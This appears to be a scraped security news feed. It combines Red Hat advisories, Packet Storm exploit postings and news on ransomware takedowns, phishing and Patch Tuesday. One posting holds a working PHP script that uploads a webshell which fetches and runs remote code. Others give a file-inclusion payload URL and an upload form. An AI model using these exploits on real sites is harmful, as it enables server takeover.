Red Hat Security Advisory 2024-6568-03 - An update for the redhat-ds:11 module is now available for Red Hat Directory Server 11.9 for RHEL 8.10. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6568.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: redhat-ds:11 security and bug fix updateAdvisory ID:        RHSA-2024:6568-03Product:            Red Hat Directory ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6568Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-5953====================================================================Summary: An update for the redhat-ds:11 module is now available for Red Hat Directory Server 11.9 for RHEL 8.10.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Directory Server is an LDAPv3-compliant directory server. The suite of packages includes the Lightweight Directory Access Protocol (LDAP) server, as well as command-line utilities and Web UI packages for server administration.Security Fixes:* 389-ds-base: Malformed userPassword hash may cause Denial of Service (CVE-2024-5953) (DIRSRV-151)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Improved performance of filter component when evaluating a large value set, such as group members (DIRSRV-149)* The new connection timeout error no longer breaks error mapping (DIRSRV-150)Users of Red Hat Directory Server 11 are advised to install these updated packages.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-5953References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2292104

Red Hat Security Advisory 2024-6568-03

Red Hat Security Advisory 2024-6536-03 - Red Hat AMQ Streams 2.5.2 is now available from the Red Hat Customer Portal. Issues addressed include bypass, denial of service, information leakage, and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6536.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat AMQ Streams 2.5.2 release and security update  
Advisory ID:        RHSA-2024:6536-03  
Product:            Streams for Apache Kafka  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6536  
Issue date:         2024-09-10  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

Red Hat AMQ Streams 2.5.2 is now available from the Red Hat Customer Portal.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. 

This release of Red Hat AMQ Streams 2.5.2 serves as a replacement for Red Hat AMQ Streams 2.5.1, and includes security and bug fixes, and enhancements.

Security Fix(es):  
* Scala: sbt is a build tool for Scala, Java, and others. Given a specially crafted zip or JAR file, `IO.unzip` allows writing of arbitrary file. This would have potential to overwrite `/root/.ssh/authorized_keys`. Within sbt's main code, `IO.unzip` is used in `pullRemoteCache` task and `Resolvers.remote`; however many projects use `IO.unzip(...)` directly to implement custom tasks. This vulnerability has been patched in version 1.9.7.(CVE-2023-46122)

* ZooKeeper: Information disclosure in persistent watcher handling. Users are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.  
(CVE-2024-23944)

* ZooKeeper: Authorization Bypass in Apache ZooKeeper [amq-st-2](CVE-2023-44981)

* Snappy: flaw was found in SnappyInputStream in snappy-java. This issue occurs when decompressing data with a too-large chunk size due to a missing upper bound check on chunk length. An unrecoverable fatal error can occur, resulting in a Denial of Service (DoS) (CVE-2023-43642)

* Kafka: snappy-java: Unchecked chunk length leads to DoS [amq-st-2](CVE-2023-34455), (CVE-2024-27309), (CVE-2024-31141)

* Strimzi Operators: vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support (CVE-2024-1300)

* Strimzi Bridge: flaw was found in SnappyInputStream in snappy-java (CVE-2023-43642)

* Strimzi Bridge: netty-codec-http: Allocation of Resources Without Limits or Throttling (CVE-2024-29025)

* Strimzi Bridge: vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support (CVE-2024-1300)

* Strimzi Bridge: netty-codec-http2: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (CVE-2023-44487)

 * Strimzi Bridge: Bump snappy-java to fix (CVE-2023-43642)

* Strimzi OAuth: In Connect2id Nimbus JOSE+JWT before 9.37.2, an attacker can cause a denial of service (resource consumption) via a large JWE p2c header value (aka iteration count) for the PasswordBasedDecrypter (PBKDF2) component. (CVE-2023-52428)

* Cruise Control: flaw was found in SnappyInputStream in snappy-java (CVE-2023-43642)

* Cruise Control: jose4j- denial of service via specially crafted JWE (CVE-2023-51775)

 * Cruise Control: Bump snappy-java to fix (CVE-2023-43642)

* Cruise Control: cruise-control reported a high-sev json vulnerability (CVE-2023-5072)

* Cruise Control: Nimbus JOSE+JWT before 9.37.2 (CVE-2023-52428)

* Strimzi Kafka Kubernetes Config Provider: Bump snappy-java to fix (CVE-2023-43642)

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/ENTMQST-5366  
https://issues.redhat.com/browse/ENTMQST-5882  
https://issues.redhat.com/browse/ENTMQST-5885  
https://issues.redhat.com/browse/ENTMQST-5886  
https://issues.redhat.com/browse/ENTMQST-6235

Red Hat Security Advisory 2024-6536-03

Profiling System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Profiling System 1.0 code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 26    Line 35  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'upload' => '',        'per_file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'per_name' => 'inouva',        'file_name' => '123',        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/ProfilingSystem/add_file_query.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/ProfilingSystem/uploads/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Profiling System 1.0 Shell Upload

Online Survey System version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

Posted Sep 11, 2024

Authored by indoushka

Online Survey System version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, xss, file inclusion

SHA-256 | 0573d4aa4fad74ba21dfae8c95d8a0ef8922ce6bbbf5c65fcd1a8b98424e3d9e

Download | Favorite | View

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

    =============================================================================================================================================| # Title     : Online Survey System 1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg[+] http://127.0.0.1/survey/index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion

Printable Staff ID Card Creator System version 1.0 suffers from an insecure direct object reference vulnerability.

=============================================================================================================================================  
| # Title     : printable staff id card creator system 1.0 idor Vulnerability                                                               |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .

[+] Line : 8 Set your Target

[+] Save As poc.html

[+] payload :

<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">  
      <div class="modal-header" style="background:#222d32">  
        <button type="button" class="close" data-dismiss="modal">×</button>  
        <h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>  
          SYSTEM INFORMATION INITIALISATION  
          </center></h4>  
      </div>  
        <form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">            

      <div class="modal-body">           
        <center>   
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>  
              <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>  
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>  
                  Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">  
                                      <input type="hidden" name="page" value="admin.php">                                                                      
         </center>  
      </div>  
      <div class="modal-footer">  
        <input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;  
        <button type="button" class="btn btn-success" data-dismiss="modal">Close</button>  
      </div>  
      </form></div>

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Printable Staff ID Card Creator System 1.0 Insecure Direct Object Reference

A veritable grab bag of tools used to access critical infrastructure networks are wildly insecure, and they're blobbing together to create a widening attack surface.

Source: Agencja Fotograficzna Caro via Alamy Stock Photo

The exploding demand for remote access into today's industrial control systems (ICS) and operational technology (OT) systems has created a nebulous, Internet-connected attack surface that's too attractive for cyberattackers to ignore. And cleanup is not going to be a simple affair.

Far too many ICS networks are being accessed by employees, partners, suppliers, and customers using a slapped-together mousetrap of tools, leaving these environments woefully exposed while connected to the Internet, according to researchers.

In a new analysis, Claroty's Team82 looked at 50,000 individual remote access-enabled devices running on industrial networks with dedicated OT hardware, and found 55% to have at least four remote access tools (RATs) in their environments. A full third (33%) reported using six or more RATs. Some organizations reported using up to 16 different of them.

Industries represented in the examples examined by the Team82 researchers included pharmaceuticals, consumer goods, food and beverage, automotive, oil and gas, mining, and manufacturing — many of which are considered critical infrastructure sectors.

"Within critical infrastructure, there is sometimes a bigger physical risk associated with a breach, depending on the jeopardized device," says Tal Laufer, Claroty's vice president of products, secure access. "That being said, all organizations with this type of tool sprawl are at risk, since it can create security gaps in their networks for threat actors to exploit."

Making matters even more complicated for cybersecurity teams, the Team82 report found that 79% of the organizations they surveyed have more than two remote access management tools in their environment that don't meet basic enterprise-grade security standards.

"Most of these tools lack the session recording, auditing, and role-based access controls that are necessary to properly defend an OT environment," the Team82 report said. "Some lack basic security features such as multi-factor authentication (MFA) options, or have been discontinued by their respective vendors and no longer receive feature or security updates."

**Cyberattackers Notice Sprawling OT Remote Access Attack Surface**

Adversaries are already well aware of the malicious possibilities that these remote access tools unlock — and have been for several years.

Laufer notes that several massive breaches in recent years have been the result of misconfigured remote access tools, including Colonial Pipeline in 2021 and Change Healthcare earlier this year.

As far back as 2020, analysts at Kaspersky warned about the risk of cyberattacks against remote access tools like TeamViewer and RMS to breach ICS environments. And in January 2023, CISA joined with the NSA to issue a warning that adversaries were launching widespread campaigns against remote management systems like AnyDesk to breach federal agencies.

Those warnings have played out: A threat actor was discovered attempting to drop XMRing cryptominer malware using TeamViewer in May 2023. Likewise, the remote access tool TeamViewer was targeted in failed attempts to compromise systems by LockBit 3.0 ransomware group in early 2024. Similarly, remote access tool production systems were compromised at AnyDesk last February, forcing the vendor to revoke all of its security clearances and reset all Web portal passwords.

Despite these warnings, ICS/OT operators are in a particularly tough spot without a clear path toward protecting themselves. The Team82 findings demonstrate how the sheer number of these tools can easily pile up within an environment, creating an ever-creeping blob of remote access surface area ripe for adversaries to probe for success. As the report detailed, each tool brings along with it its own supply chain weaknesses, often including a lack of basic, best-practice security features like MFA, auditing, and session recording.

Compounding the issue is a basic lack of monitoring, detection, and policy control tooling that works across disparate remote access systems, leaving them open to misconfigurations, as messy policy and control management, the report added.

The report added that managing all these various RATs, and the hardware behind them, is an expensive operational proposition.

**OT Remote Access Cleanup**

Unsurprisingly, the first step on the path to securing remote access for ICS/OT networks is to get a full inventory of the tools that provide access to OT assets, according to the report.

"A critical first step is ensuring you have complete visibility into your organization’s OT network to understand how many and which solutions are providing access to OT assets and industrial control systems (ICS)," Laufer explains.

Next, those solutions that don't meet basic enterprise cybersecurity requirements need to go — pronto.

"From there, engineers and assets managers need to actively eliminate or minimize the use of low-security remote access tools in the OT environment — especially taking into consideration those with known vulnerabilities or those lacking essential security features such as MFA," the researcher stresses.

It's also crucial to develop and require baseline security standards across the organization's supply chain. "Beyond this, security teams should also govern the use of remote access tools connected to OT and ICS," Laufer says. "This can help with alignment of security requirements and expansion of those requirements as needed throughout third parties within the supply chain."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

Remote Access Sprawl Strains Industrial OT Network Security

The threat of ransomware hasn't gone away. But law enforcement has struck a blow by adjusting its tactics and taking out some of the biggest adversaries in the ransomware scene.

Source: Andreas Prott via Alamy Stock Photo

COMMENTARY

The year to date has been particularly eventful across the ransomware landscape, with prolific ransomware groups, including LockBit, seeing their operations seized and dismantled. The strategies used to take down these groups were meticulously planned and executed, successfully undermining the most accomplished cybercriminal experts.

The fight against ransomware has for years felt like an uphill battle. Each takedown faces the inevitable criticism that these actions are temporary, resulting in groups reforming and coming back.

However, the past year has seen some of history's biggest takedowns, with international collaborative efforts from law enforcement employing new tactics. Are we seeing the balance of power beginning to shift?

**The Development of Law Enforcement's Strategy**

Law enforcement agencies have had to change their approach to remain successful in an environment where cybercriminal gangs adapt and develop constantly. Although previous takedowns have shown initial success in disrupting gangs on a technical level, law enforcement agencies have recognized the need to go further and think outside of the box.

Adding a twist, ransomware takedown teams are focusing on publicly damaging groups' credibility, acknowledging the fact that reputation and trust are (somewhat counterintuitively) valued commodities on the Dark Web.

Law enforcement's new approach was rolled out with Operation Cronos, the disruption campaign against one of the most prolific ransomware gangs, LockBit.

With a force of 10 countries' law enforcement agencies, the highlights of the takedown included 34 servers being seized, 200 cryptocurrency accounts being frozen, and two arrests taking place, and it didn't stop there.

The National Crime Agency (NCA) deployed psyops methods, using LockBits' own site, which it had hijacked, to publish images of LockBit's administration system and leak internal conversations, while publishing the usernames and login details of 194 LockBit "affiliate" members. Then, the unmasking of "LockBitSupp" — the gang's leader — was teased with a countdown timer on the LockBit website, eventually naming him as Dmitry Khoroshev. Law enforcement also implied that he had collaborated with them by leaking the affiliate's details, creating more doubt among Dark Web associates. 

When logging in to their systems, LockBit members were greeted with personalized messages stating that the authorities had details regarding their IP addresses, cryptocurrency wallet details, internal chats, and their personal identity.

Law enforcement's strategy undermined LockBit's reputation and emphasized its fragility. Hijacking the website exposed infrastructure weaknesses, unmasking LockBit's leader proved he had weak operations security, and leaking the affiliates demonstrated the risks of associating with LockBit. These methods dethroned LockBit's reputation further. Although the group is still active, recent data shows that the average number of monthly LockBit attacks in the UK has reduced by 73% since February.

**The Snowball Effect in the Dark Web Community**

The LockBit takedown has caused a ripple effect and garnered a lot of attention across the ransomware landscape, eliciting the message that if LockBit can be taken down, anyone could be next. Targeting the biggest ransomware group was law enforcement's message that no group is beyond its reach.

Two weeks later, BlackCat, the second biggest ransomware group, claimed to have been disrupted by law enforcement, even uploading a fake seizure banner. However, law enforcement quickly denied its involvement. In fact, the group appears to have closed itself down after stealing a large sum of money from its affiliate, following a ransomware attack on Change Healthcare. The timing of BlackCat's retirement suggests a potential reaction to the LockBit takedown, showing a newfound sense of fear on the Dark Web.

**What Comes Next?**

Disrupting some of the world's most dangerous and prolific ransomware groups such as LockBit and BlackCat, which have dominated the ransomware landscape in recent years, is a huge achievement. 

Of course, these successes have not immediately led to the collapse of the ransomware underground. In fact, our statistics show that there were 73 ransomware groups in operation in the first half 2024 compared with the same period for 2023, representing a 56% increase in the number of ransomware groups. 

However, although there are more groups, we have seen a 16% decrease in victims listed between the second half of 2023 and the first half of 2024, which suggests that taking on the big groups with new tactics has had a measurable impact. It appears that what we are actually observing is a diversification — rather than growth — in the ransomware landscape.

A recent Europol report also highlighted a fragmentation of the ransomware landscape. While the threat is no longer coming primarily from a group of three to four dominant ransomware-as-a-service (RaaS) groups, the affiliates who led a mass exodus have started their own operations, developing their own ransomware tooling and lessening their reliance on the big players. 

This creates its own challenges for security professionals. A more diverse ransomware ecosystem means a more diverse landscape for cybersecurity teams to navigate. As things move quickly in the ransomware world, collecting up-to-date intelligence on ransomware groups is more important than ever before.

The threat of ransomware hasn't gone away. However, law enforcement has certainly struck a blow by adjusting its tactics and has potentially created some breathing room for security professionals by taking out some of the biggest adversaries in the ransomware scene.

**About the Author**

CTO & Co-founder, Searchlight Cyber

Dr. Gareth Owenson is the CTO and co-founder of the Dark Web intelligence company Searchlight Cyber. Gareth completed his Ph.D. in computer science in 2007 and is a world leader in Tor Dark Web research. He advises governments, military, and law enforcement on Dark Web technologies and guides the development of a suite of technologies that have put Searchlight Cyber in the forefront of Dark Web investigative and intelligence efforts. Gareth co-founded Searchlight Cyber in 2017 to help governments, law enforcement, and enterprises in the fight to protect society from threats that emanate from the Dark Web.

How Law Enforcement's Ransomware Strategies Are Evolving

Cybercriminals target Trump’s digital trading cards using phishing sites, fake domains, and social engineering tactics to steal sensitive…

Cybercriminals target Trump’s digital trading cards using phishing sites, fake domains, and social engineering tactics to steal sensitive data. Scammers create fake URLs mimicking the official site to deceive collectors.

Cybercriminals are now aiming at your digital collectable cards, with former President Donald Trump‘s new digital trading cards being the latest target. Since launching, Trump’s digital trading cards, which offer exclusive digital assets and real-life experiences, have generated substantial attention among collectors and supporters.

According to cybersecurity firm Veriti, malicious actors are using phishing sites, fake domains and various social engineering tactics to trick users into revealing sensitive information or installing malware.

One example of a fake domain is trumpdigitaltradingcards/.xyz, which mimics the official URL (collecttrumpcards/.com) but with subtle differences. Another instance is a fake site from the Democratic Party, which surfaced under the domain collecttrunpcards/.com in which the domain uses an “N” replacing the “M” in “Trump”).

Fake websites (Screenshot: Veriti)

****But how do these scams work?****

Attackers are using traditional phishing tactics, including email phishing and domain typosquatting, to lure in victims. Email phishing involves sending emails that appear to be from legitimate sources, and promoting limited-time offers on Trump’s digital cards, which often contain malicious links that lead to phishing websites.

“Attackers are leveraging the popularity of these trading cards to exploit users’ curiosity and desire to acquire them,” explained Veriti in its report shared with Hackread.com ahead of publishing on Tuesday. “The scams range from fake websites that look almost identical to the official site to more traditional phishing emails promising limited-time offers.”

****Not The First Time****

Trump has been used as bait for cybercrime before, and his supporters have been targeted in financial scams multiple times. In July of this year, scammers stole donations from his supporters by setting up fake and malicious websites.

In another scam, hackers used a fake Trump assassination story to steal cryptocurrency from his supporters. In January 2021, a phishing video link tied to Trump’s election campaign was found spreading the QNode RAT malware.

Nevertheless, if digital collectable cards are your passion, it’s essential to be aware of the associated risks. By staying alert and taking necessary precautions, you can protect yourself from phishing scams and your personal information from scammers. Follow these simple tips to stay secure:

*   Use common sense; it’s the best defence against any kind of attack.
*   Look for HTTPS, which adds a layer of security to your browsing experience.
*   Double-check URLs before entering any personal information, as phishing sites often use slight variations in spelling to fool users.
*   Be cautious of unsolicited emails, and instead of clicking directly on the link, navigate to the official website by typing in the URL manually.
*   Follow Hackread.com for the latest news on cybersecurity and online scams.

1.  **Trump campaign website defaced with “site seizure” notice**
2.  **Fake Trump’s scandal video campaign spreading QNode RAT**
3.  **Researcher logs into Trump’s Twitter with password MAGA2020**
4.  **Federal Agency that maintains secure COMM for Trump HACKED**
5.  **2 arrested for Hacking DC Security Cams Before Trump Inauguration**

Hackers Use Fake Domains to Trick Trump Supporters in Trading Card Scam

The Singapore Police Force (SPF) has announced the arrest of five Chinese nationals and one Singaporean man for their alleged involvement in illicit cyber activities in the country.
The development comes after a group of about 160 law enforcement officials conducted a series of raids on September 9, 2024, simultaneously at several locations.
The six men, aged between 32 and 42, are suspected of

The Singapore Police Force (SPF) has announced the arrest of five Chinese nationals and one Singaporean man for their alleged involvement in illicit cyber activities in the country.

The development comes after a group of about 160 law enforcement officials conducted a series of raids on September 9, 2024, simultaneously at several locations.

The six men, aged between 32 and 42, are suspected of being linked to a "global syndicate" that conducts malicious cyber activities. Pursuant to the operation, electronic devices and cash were seized.

Among those apprehended includes a 42-year-old Chinese national from Bidadari Park Drive, who was found to be in possession of a laptop that contained credentials to access web servers used by known hacker groups. The identities of the threat actors were not disclosed.

In addition, five laptops, six mobile phones, cash totaling more than S$24,000 (USD$18,400), and cryptocurrency worth approximately USD$850,000 were confiscated from the individual.

Three other Chinese nationals, arrested from Mount Sinai Avenue, are said to have been possessing laptops containing personal information related to foreign internet service providers, hacking tools, and "specialized software to control malware" such as PlugX, a remote access trojan widely used by Chinese state-sponsored groups.

The authorities also seized seven laptops, 11 mobile phones, and cash worth more than S$54,600 (USD$41,900) from the three men.

Another 38-year-old Chinese national was arrested from Cairnhill Road over suspicions of "offering to purchase personally identifiable information that was believed to have been obtained through illegal means."

The sixth person, a 34-year-old Singaporean national residing in Hougang Avenue, is believed to have assisted the others in their malicious activities.

The defendants have been charged with offenses under the Computer Misuse Act 1993 for gaining unauthorized access to computer material, retaining personal information without authorization, and retaining software that could be used to commit other malicious attacks.

The Singaporean national has also been charged with abetting the securing of unauthorized access to websites, an offense that's punishable with a fine of up to S$5,000 (USD$3,830), or a jail term of up to two years, or both, for a first-time offender.

Channel News Asia has reported that a sixth Chinese national was also subsequently arrested on Wednesday for instructing the Singapore man to subscribe to a Singtel broadband plan.

"This is a significant operation as the individuals are suspected to be carrying out global malicious cyber operations from Singapore," the SPF said. "We have zero tolerance of the use of Singapore to conduct criminal activities, including illegal cyber activities. We will deal severely with perpetrators."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Singapore Police Arrest Six Hackers Linked to Global Cybercrime Syndicate

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.
The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech

Windows Security / Vulnerability

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.

The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech giant resolved in its Chromium-based Edge browser since last month's Patch Tuesday release.

The three vulnerabilities that have been weaponized in a malicious context are listed below, alongside a bug that Microsoft is treating as exploited -

*   **CVE-2024-38014** (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability
*   **CVE-2024-38217** (CVSS score: 5.4) - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability
*   **CVE-2024-38226** (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability
*   **CVE-2024-43491** (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability

"Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement.

"In both cases, the target needs to be convinced to open a specially crafted file from an attacker-controlled server. Where they differ is that an attacker would need to be authenticated to the system and have local access to it to exploit CVE-2024-38226."

As disclosed by Elastic Security Labs last month, CVE-2024-38217 – also referred to as LNK Stomping – is said to have been abused in the wild as far back as February 2018.

CVE-2024-43491, on the other hand, is notable for the fact that it's similar to the downgrade attack that cybersecurity company SafeBreach detailed early last month.

"Microsoft is aware of a vulnerability in Servicing Stack that has rolled back the fixes for some vulnerabilities affecting Optional Components on Windows 10, version 1507 (initial version released July 2015)," Redmond noted.

"This means that an attacker could exploit these previously mitigated vulnerabilities on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB) systems that have installed the Windows security update released on March 12, 2024 — KB5035858 (OS Build 10240.20526) or other updates released until August 2024."

The Windows maker further said it can be resolved by installing the September 2024 Servicing stack update (SSU KB5043936) and the September 2024 Windows security update (KB5043083), in that order.

It's also worth pointing out that Microsoft's "Exploitation Detected" assessment for CVE-2024-43491 stems from the rollback of fixes that addressed vulnerabilities impacting some Optional Components for Windows 10 (version 1507) that have been previously exploited.

"No exploitation of CVE-2024-43491 itself has been detected," the company said. "In addition, the Windows product team at Microsoft discovered this issue, and we have seen no evidence that it is publicly known."

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Arm
*   Bosch
*   Broadcom (including VMware)
*   Cisco
*   Citrix
*   CODESYS
*   D-Link
*   Dell
*   Drupal
*   F5
*   Fortinet
*   Fortra
*   GitLab
*   Google Android and Pixel
*   Google Chrome
*   Google Cloud
*   Google Wear OS
*   Hitachi Energy
*   HP
*   HP Enterprise (including Aruba Networks)
*   IBM
*   Intel
*   Ivanti
*   Lenovo
*   Linux distributions Amazon Linux, Debian, Oracle Linux, Red Hat, Rocky Linux, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MongoDB
*   Mozilla Firefox, Firefox ESR, Focus and Thunderbird
*   NVIDIA
*   ownCloud
*   Palo Alto Networks
*   Progress Software
*   QNAP
*   Qualcomm
*   Rockwell Automation
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SolarWinds
*   SonicWall
*   Spring Framework
*   Synology
*   Veeam
*   Zimbra
*   Zoho ManageEngine ServiceDesk Plus, SupportCenter Plus, and ServiceDesk Plus MSP
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web